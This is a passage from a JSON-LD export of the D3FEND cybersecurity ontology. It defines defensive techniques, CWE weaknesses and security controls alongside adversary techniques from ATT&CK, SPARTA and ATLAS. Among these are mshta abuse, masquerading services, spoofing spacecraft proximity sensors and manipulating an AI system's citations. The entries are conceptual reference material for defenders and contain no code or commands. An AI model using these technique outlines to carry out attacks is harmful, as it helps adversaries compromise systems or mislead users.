      "@id": "_:N51f8aa1e146d4ea3919da3fa7293ed41",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SSHSession"
      }
    },
    {
      "@id": "d3f:RestoreConfiguration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreConfiguration"
      ],
      "d3f:d3fend-id": "D3-RC",
      "d3f:definition": "Restoring an software configuration.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:ConfigurationResource"
      },
      "rdfs:label": "Restore Configuration",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreObject"
        },
        {
          "@id": "_:N3b4ee1a484594c6aa1dd241d0758e6e9"
        }
      ]
    },
    {
      "@id": "_:N3b4ee1a484594c6aa1dd241d0758e6e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:Semi-supervisedWrapperMethod",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSWM",
      "d3f:definition": "The principle behind wrapper methods is that we train a model with labeled data and then generate pseudo-labels for the unlabeled data using the trained model iteratively.",
      "d3f:kb-article": "## References\nJashish, M. (n.d.). Beginner's Guide to Semi-Supervised Learning. Jashish Blog.  [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/).",
      "rdfs:label": "Semi-supervised Wrapper Method",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-SupervisedLearning"
      }
    },
    {
      "@id": "d3f:DomainRegistration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A domain registration, or domain name registration data, is the relevant registration data from Internet resources such as domain names, IP addresses, and autonomous system numbers. Registration data is typically retrieved by means of either the Registration Data Access Protocol (RDAP) or its predecessor, the WHOIS protocol.",
      "d3f:may-contain": {
        "@id": "d3f:DomainName"
      },
      "rdfs:label": "Domain Registration",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Domain_registration"
        },
        {
          "@id": "dbr:WHOIS"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformation"
        },
        {
          "@id": "_:Na8a036da4c5d47ff9ca98fbf789428c7"
        }
      ],
      "skos:altLabel": "Domain Name Registration Data"
    },
    {
      "@id": "_:Na8a036da4c5d47ff9ca98fbf789428c7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainName"
      }
    },
    {
      "@id": "d3f:M1028",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:PlatformHardening"
      },
      "rdfs:label": "Operating System Configuration"
    },
    {
      "@id": "d3f:T1036.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1036.004",
      "d3f:definition": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.",
      "d3f:modifies": {
        "@id": "d3f:JobSchedule"
      },
      "rdfs:label": "Masquerade Task or Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1036"
        },
        {
          "@id": "_:N41b12baae24d4559a854006d8d80f5bc"
        }
      ]
    },
    {
      "@id": "_:N41b12baae24d4559a854006d8d80f5bc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JobSchedule"
      }
    },
    {
      "@id": "d3f:T1586",
      "@type": "owl:Class",
      "d3f:attack-id": "T1586",
      "d3f:definition": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.",
      "rdfs:label": "Compromise Accounts",
      "rdfs:subClassOf": {
        "@id": "d3f:ResourceDevelopmentTechnique"
      }
    },
    {
      "@id": "d3f:CWE-1073",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1073",
      "d3f:definition": "The product contains a client with a function or method that contains a large number of data accesses/queries that are sent through a data manager, i.e., does not use efficient database capabilities.",
      "rdfs:label": "Non-SQL Invokable Control Element with Excessive Number of Data Resource Accesses",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:CCI-000020_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system dynamically manages user privileges and associated access authorizations.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000020"
    },
    {
      "@id": "d3f:OSAPIMoveFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that moves or renames a file or directory from one location to another within the file system.",
      "d3f:invokes": {
        "@id": "d3f:MoveFile"
      },
      "rdfs:label": "OS API Move File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N5efcf52b9b2d439ebdaad3cddd616640"
        }
      ]
    },
    {
      "@id": "_:N5efcf52b9b2d439ebdaad3cddd616640",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MoveFile"
      }
    },
    {
      "@id": "d3f:OTDeleteControlProgramCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a remote device to remove an existing control program.",
      "d3f:modifies": {
        "@id": "d3f:OTControlProgram"
      },
      "rdfs:label": "OT Delete Control Program Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyControlProgramCommand"
        },
        {
          "@id": "_:N8780594b6de149f9b20b6aedb0ddc407"
        }
      ]
    },
    {
      "@id": "_:N8780594b6de149f9b20b6aedb0ddc407",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "d3f:CCI-001937_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The device used in the information system implementation of multifactor authentication for network access to privileged accounts meets organization-defined strength of mechanism requirements.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001937"
    },
    {
      "@id": "d3f:Semi-supervisedGenerativeModelLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSGML",
      "d3f:definition": "A Semi Supervised Machine Learning model which assume that the distributions take some particular form p(x|y,theta) parameterized by the vector. If these assumptions are incorrect, the unlabeled data may actually decrease the accuracy of the solution relative to what would have been obtained from labeled data alone. However, if the assumptions are correct, then the unlabeled data necessarily improves performance.",
      "d3f:kb-article": "## References\nWeak supervision. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Weak_supervision#Generative_models).",
      "rdfs:label": "Semi-supervised Generative Model Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:IntrinsicallySemi-supervisedLearning"
      }
    },
    {
      "@id": "d3f:AML.TA0009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0009",
      "d3f:definition": "The adversary is trying to gather AI artifacts and other related information relevant to their goal.\n\nCollection consists of techniques adversaries may use to gather information and the sources information is collected from that are relevant to following through on the adversary's objectives.\nFrequently, the next goal after collecting data is to steal (exfiltrate) the AI artifacts, or use the collected information to stage future operations.\nCommon target sources include software repositories, container registries, model repositories, and object stores.",
      "rdfs:label": "Collection - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0009"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Collection"
    },
    {
      "@id": "d3f:CWE-674",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-674",
      "d3f:definition": "The product does not properly control the amount of recursion that takes place, consuming excessive resources, such as allocated memory or the program stack.",
      "d3f:synonym": "Stack Exhaustion",
      "rdfs:label": "Uncontrolled Recursion",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-834"
      }
    },
    {
      "@id": "d3f:CWE-37",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-37",
      "d3f:definition": "The product accepts input in the form of a slash absolute path ('/absolute/pathname/here') without appropriate validation, which can allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Traversal: '/absolute/pathname/here'",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-160"
        },
        {
          "@id": "d3f:CWE-36"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1429",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1429",
      "d3f:definition": "The product has a hardware interface that silently discards operations in situations for which feedback would be security-relevant, such as the timely detection of failures or attacks.",
      "rdfs:label": "Missing Security-Relevant Feedback for Unexecuted Operations in Hardware Interface",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-223"
      }
    },
    {
      "@id": "d3f:d3fend-comment",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x d3fend-comment y: The entity x has an D3FEND team written a public note about entity y.",
      "rdfs:label": "d3fend-comment",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-data-property"
      }
    },
    {
      "@id": "d3f:WindowsGetThreadContext",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Retrieves the context of the specified thread.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNTGetThreadContext"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getthreadcontext"
      },
      "rdfs:label": "Windows GetThreadContext",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIGetThreadContext"
        },
        {
          "@id": "_:N491ab029c1874d9d8f252bf4bb3d9928"
        }
      ]
    },
    {
      "@id": "_:N491ab029c1874d9d8f252bf4bb3d9928",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNTGetThreadContext"
      }
    },
    {
      "@id": "d3f:AML.T0067.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0067.000",
      "d3f:definition": "Adversaries may manipulate the citations provided in an AI system's response, in order to make it appear trustworthy. Variants include citing a providing the wrong citation, making up a new citation, or providing the right citation but for adversary-provided data.",
      "rdfs:label": "Citations - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0067.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0067"
      },
      "skos:prefLabel": "Citations"
    },
    {
      "@id": "d3f:T1585.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1585.002",
      "d3f:definition": "Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Establishing email accounts may also allow adversaries to abuse free services – such as trial periods – to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for follow-on purposes.(Citation: Free Trial PurpleUrchin)",
      "rdfs:label": "Email Accounts",
      "rdfs:subClassOf": {
        "@id": "d3f:T1585"
      }
    },
    {
      "@id": "d3f:CWE-25",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-25",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \"/../\" sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '/../filedir'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:CWE-482",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-482",
      "d3f:definition": "The code uses an operator for comparison when the intention was to perform an assignment.",
      "rdfs:label": "Comparing instead of Assigning",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-480"
      }
    },
    {
      "@id": "d3f:M1024",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "rdfs:label": "Restrict Registry Permission"
    },
    {
      "@id": "d3f:CWE-308",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-308",
      "d3f:definition": "The use of single-factor authentication can lead to unnecessary risk of compromise when compared with the benefits of a dual-factor authentication scheme.",
      "rdfs:label": "Use of Single-factor Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1390"
        },
        {
          "@id": "d3f:CWE-654"
        }
      ]
    },
    {
      "@id": "d3f:T1218.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1218.005",
      "d3f:definition": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)",
      "d3f:interprets": {
        "@id": "d3f:MicrosoftHTMLApplication"
      },
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "Mshta",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1218"
        },
        {
          "@id": "_:N927b47fce22e43feb13b57d5dae0af8f"
        },
        {
          "@id": "_:N3d71e0d689cc4e6d9a5f43e2736a6902"
        }
      ]
    },
    {
      "@id": "_:N927b47fce22e43feb13b57d5dae0af8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:interprets"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MicrosoftHTMLApplication"
      }
    },
    {
      "@id": "_:N3d71e0d689cc4e6d9a5f43e2736a6902",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:DE-0009.04",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0009.04",
      "d3f:definition": "The attacker aims at the spacecraft’s own proximity-awareness stack, cameras, star-tracker side products, lidar/radar, RF transponders, and the onboard fusion that estimates nearby objects. Methods include optical dazzling or reflective camouflage that confuses centroiding and detection, RCS management to fall below radar gate thresholds, intermittent or misleading transponder replies, and presentation of spoofed fiducials or optical patterns tuned to the vehicle’s detection algorithms. By biasing these local sensors and their fusion logic, the adversary hides approach, distorts relative-state estimates, or induces the target to classify a nearby object as benign clutter, masking proximity operations without relying on external catalog errors.",
      "rdfs:label": "Targeted Deception of Onboard SSA/SDA Sensors - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0009/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0009"
      },
      "skos:prefLabel": "Targeted Deception of Onboard SSA/SDA Sensors"
    },
    {
      "@id": "d3f:T1059.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.008",
      "d3f:definition": "Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands.",
      "rdfs:label": "Network Device CLI",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:CCI-002717_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:FileHashing"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to detect unauthorized changes to firmware.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002717"
    },
    {
      "@id": "d3f:RD-0001.01",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0001.01",
      "d3f:definition": "Rather than compromising existing stations, adversaries may acquire or assemble their own RF ground stack. Typical building blocks include: steerable mounts with auto-track, time/frequency standards, band-appropriate antennas and feeds, LNAs and filters at the feed, low-loss IF chains, T/R switching, medium/high-power amplifiers with protection and telemetry, and weather protection. Baseband equipment often mixes SDRs with commercial modems to generate/capture mission waveforms and framing; signal generators and spectrum analyzers support calibration and banner-grabbing. On the digital side, ground data processors translate captured frames to packetized formats for analysis and rehearsal. With this kit, an actor can passively collect, actively probe, or attempt spoofing if link-layer authentication is weak.",
      "rdfs:label": "Ground Station Equipment - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0001/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0001"
      },
      "skos:prefLabel": "Ground Station Equipment"
    },
    {
      "@id": "d3f:CWE-464",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-464",
      "d3f:definition": "The accidental addition of a data-structure sentinel can cause serious programming logic problems.",
      "rdfs:label": "Addition of Data Structure Sentinel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:T0847",
      "@type": "owl:Class",
      "d3f:attack-id": "T0847",
      "d3f:definition": "Adversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment. The adversary may rely on unknowing trusted third parties, such as suppliers or contractors with access privileges, to introduce the removable media. This technique enables initial access to target devices that never connect to untrusted networks, but are physically accessible.",
      "rdfs:label": "Replication Through Removable Media - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Replication Through Removable Media"
    },
    {
      "@id": "d3f:T1491.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1491.001",
      "d3f:definition": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)",
      "d3f:modifies": {
        "@id": "d3f:Resource"
      },
      "rdfs:label": "Internal Defacement",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1491"
        },
        {
          "@id": "_:Nfee1b7e611294d90bbe646abb71d9b5b"
        }
      ]
    },
    {
      "@id": "_:Nfee1b7e611294d90bbe646abb71d9b5b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:T1124",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1124",
      "d3f:definition": "An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or <code>systemsetup</code> on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time)",
      "d3f:may-invoke": [
        {
          "@id": "d3f:CreateProcess"
        },
        {
          "@id": "d3f:GetSystemTime"
        }
      ],
      "rdfs:label": "System Time Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:Nfc1b7fa59e994508b2a663a02497fcc0"
        },
        {
          "@id": "_:Neac00d1800644d61badf00ded0a2b2b4"
        }
      ]
    },
    {
      "@id": "_:Nfc1b7fa59e994508b2a663a02497fcc0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:Neac00d1800644d61badf00ded0a2b2b4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetSystemTime"
      }
    },
    {
      "@id": "d3f:CCI-001170_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents the automatic execution of mobile code in organization-defined software applications.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001170"
    },
    {
      "@id": "d3f:CWE-686",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-686",
      "d3f:definition": "The product calls a function, procedure, or routine, but the caller specifies an argument that is the wrong data type, which may lead to resultant weaknesses.",
      "rdfs:label": "Function Call With Incorrect Argument Type",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-628"
      }
    },
    {
      "@id": "d3f:T1398",
      "@type": "owl:Class",
      "d3f:attack-id": "T1398",
      "d3f:definition": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts are part of the underlying operating system and are not accessible to the user unless the device has been rooted or jailbroken.",
      "rdfs:label": "Boot or Logon Initialization Scripts - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePersistenceTechnique"
      },
      "skos:prefLabel": "Boot or Logon Initialization Scripts"
    },
    {
      "@id": "d3f:WindowsRegistryValueDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a registry value is deleted from the Windows Registry, permanently removing its associated data.",
      "rdfs:label": "Windows Registry Value Deletion Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryValueEvent"
        },
        {
          "@id": "_:Nf04d8b2e17e64effbe89b06eafdcf1a1"
        }
      ]
    },
    {
      "@id": "_:Nf04d8b2e17e64effbe89b06eafdcf1a1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryValueSetEvent"
      }
    },
    {
      "@id": "d3f:T1588.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1588.001",
      "d3f:definition": "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.",
      "rdfs:label": "Malware",
      "rdfs:subClassOf": {
        "@id": "d3f:T1588"
      }
    },
    {
      "@id": "d3f:CWE-673",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-673",
      "d3f:definition": "The product does not prevent the definition of control spheres from external actors.",
      "rdfs:label": "External Influence of Sphere Definition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CWE-143",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-143",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as record delimiters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Record Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-140"
      }
    },
    {
      "@id": "d3f:T1509",
      "@type": "owl:Class",
      "d3f:attack-id": "T1509",
      "d3f:definition": "Adversaries may generate network traffic using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088 or port 587 as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.",
      "rdfs:label": "Non-Standard Port - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Non-Standard Port"
    },
    {
      "@id": "d3f:SpecificationReference",
      "@type": "owl:Class",
      "d3f:pref-label": "Specification",
      "rdfs:label": "Specification Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "d3f:Firmware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In electronic systems and computing, firmware is a type of software that provides control, monitoring and data manipulation of engineered products and systems. Typical examples of devices containing firmware are embedded systems (such as traffic lights, consumer appliances, remote controls and digital watches), computers, computer peripherals, mobile phones, and digital cameras. The firmware contained in these devices provides the low-level control program for the device.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Firmware"
      },
      "rdfs:label": "Firmware",
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:TrustedAdministratorAttacker",
      "@type": "owl:Class",
      "d3f:definition": "A trusted attacker who misuses administrative access to execute attacks, often with elevated privileges.",
      "rdfs:label": "Trusted Administrator Attacker",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:TrustedAttacker"
        },
        {
          "@id": "_:N2f928de2383f477888409174dfde67e4"
        }
      ]
    },
    {
      "@id": "_:N2f928de2383f477888409174dfde67e4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PrivilegedUserAccount"
      }
    },
    {
      "@id": "d3f:may-harden",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may harden",
      "rdfs:label": "may-harden",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-counter-attack"
      }
    },
    {
      "@id": "d3f:AuthenticationEventThresholding",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AuthenticationEventThresholding"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Authentication"
      },
      "d3f:created": {
        "@type": "xsd:dateTime",
        "@value": "2020-08-05T00:00:00"
      },
      "d3f:d3fend-id": "D3-ANET",
      "d3f:definition": "Collecting authentication events, creating a baseline user profile, and determining whether authentication events are consistent with the baseline profile.",
      "d3f:kb-article": "## How it works\nAuthentication event data is collected (logon information such as device id, time of day, day of week, geo-location, etc.) to create an activity baseline. Then, a threshold is determined either through a manually specified configuration, or a statistical analysis of deviations in historical data. New authentication events are evaluated to determine if a threshold is exceeded. Thresholds can be static or dynamic.\n\n### Actions\nAs a result of the analysis, actions taken could include:\n\n* [Account Locking](/technique/d3f:AccountLocking)\n* Raising an alert\n\n### Example data sources\n * Directory server logs\n * VPN Server logs\n * IDAM Capability logs\n * NAC logs\n * Authentication client logs\n * Kerberos network traffic\n * LDAP network traffic\n\n## Considerations\n\nThis technique covers statistical outliers. Though depending on the complexity or dimensionality of the data considered, outliers may not be obvious to a human analyst reviewing events in simplistic analytic views. If the malicious activity is not statistically different from benign activity, an alert threshold will not be met.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndApparatusForNetworkFraudDetectionAndRemediationThroughAnalytics_IdaptiveLLC"
        },
        {
          "@id": "d3f:Reference-SimultaneousLoginsOnAHost_MITRE"
        },
        {
          "@id": "d3f:Reference-UserLoggedInToMultipleHosts_MITRE"
        },
        {
          "@id": "d3f:Reference-UserLoginActivityMonitoring_MITRE"
        },
        {
          "@id": "d3f:Reference-System,Method,AndComputerProgramProductForDetectingAndAssessingSecurityRisksInANetwork_ExabeamInc"
        }
      ],
      "rdfs:label": "Authentication Event Thresholding",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:Nb380846e7e4b4de6ac7bf4b425c7065e"
        }
      ]
    },
    {
      "@id": "_:Nb380846e7e4b4de6ac7bf4b425c7065e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
